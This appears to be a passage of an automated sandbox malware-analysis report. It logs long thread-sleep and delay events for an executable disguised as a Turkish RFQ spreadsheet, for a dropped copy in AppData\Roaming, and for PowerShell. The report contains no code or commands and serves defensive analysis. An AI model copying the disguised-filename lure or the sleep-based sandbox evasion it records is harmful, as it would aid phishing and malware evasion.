                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599728s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599606s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4480Thread sleep count: 6003 > 30Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -599046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598170s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -598062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597733s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597620s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597509s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597243s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -597120s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596996s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596759s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596413s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596307s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -596078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -595093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594982s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe TID: 4036Thread sleep time: -594218s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7552Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3580Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239528s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239202s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -239081s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -238850s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -238436s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -238328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 5944Thread sleep time: -238218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 4132Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep count: 34 > 30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -31359464925306218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8080Thread sleep count: 2540 > 30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8080Thread sleep count: 7321 > 30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599671s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -599015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598796s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598468s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598249s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -598031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597591s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597374s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -597047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596935s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596827s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596718s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596390s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596280s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596171s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -596062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595949s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595842s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595296s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -595078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -594968s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -594859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -594750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exe TID: 8088Thread sleep time: -594640s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239765Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239629Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239500Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239390Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239281Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 239052Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238906Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238781Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238668Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238562Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238453Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238343Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238226Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 238107Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237922Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237781Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 237667Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599728Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599606Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599484Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599375Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 599046Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598170Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597733Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597620Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597509Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597243Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 597120Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596996Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596875Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596759Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596531Jump to behavior
